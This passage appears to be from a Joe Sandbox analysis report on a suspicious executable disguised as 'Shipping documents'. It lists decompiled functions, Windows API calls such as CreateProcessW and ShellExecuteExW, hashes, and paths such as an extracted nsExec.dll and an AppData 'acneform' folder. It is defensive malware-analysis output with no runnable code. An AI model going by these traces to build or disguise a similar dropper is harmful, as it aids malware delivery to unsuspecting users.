                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                        • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                        • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                        • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                        Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                        • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                        • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                        • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                        Function 004063C4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,Exec,?,00000000), ref: 004063E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
                                        Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
                                        • Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
                                        • Opcode Fuzzy Hash: e4d35ef24f86c86e365822f81ff15bb63714950be14a167d72dedfa96a9168d0
                                        • Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                        Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                        • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                        • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                        • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                        Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteExW.SHELL32(?), ref: 00405B8C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID:
                                        • API String ID: 587946157-0
                                        • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                        • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                        • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                        • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                        Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                        • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                        • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                        • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                        Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                        Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                        • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                        • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                        • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                        Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                          • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                          • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                          • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                          • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                        • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                        • Opcode Fuzzy Hash: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                        • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

                                        Non-executed Functions

                                        Function 004049C7 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                        • lstrcmpiW.KERNEL32(Exec,0042CA68,00000000,?,?), ref: 00404B2E
                                        • lstrcatW.KERNEL32(?,Exec), ref: 00404B3A
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                          • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                          • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                          • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                          • Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                          • Part of subcall function 00406805: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                        • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                          • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                          • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                          • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\acneform$Exec
                                        • API String ID: 2624150263-2768821173
                                        • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                        • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                        • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                        • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                        Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                        Strings
                                        • C:\Users\user\AppData\Local\acneform\Baroco, xrefs: 0040226E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: C:\Users\user\AppData\Local\acneform\Baroco
                                        • API String ID: 542301482-727163374
                                        • Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                        • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                        • Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                        • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                        Function 00406DC6 Relevance: .3, Instructions: 334COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
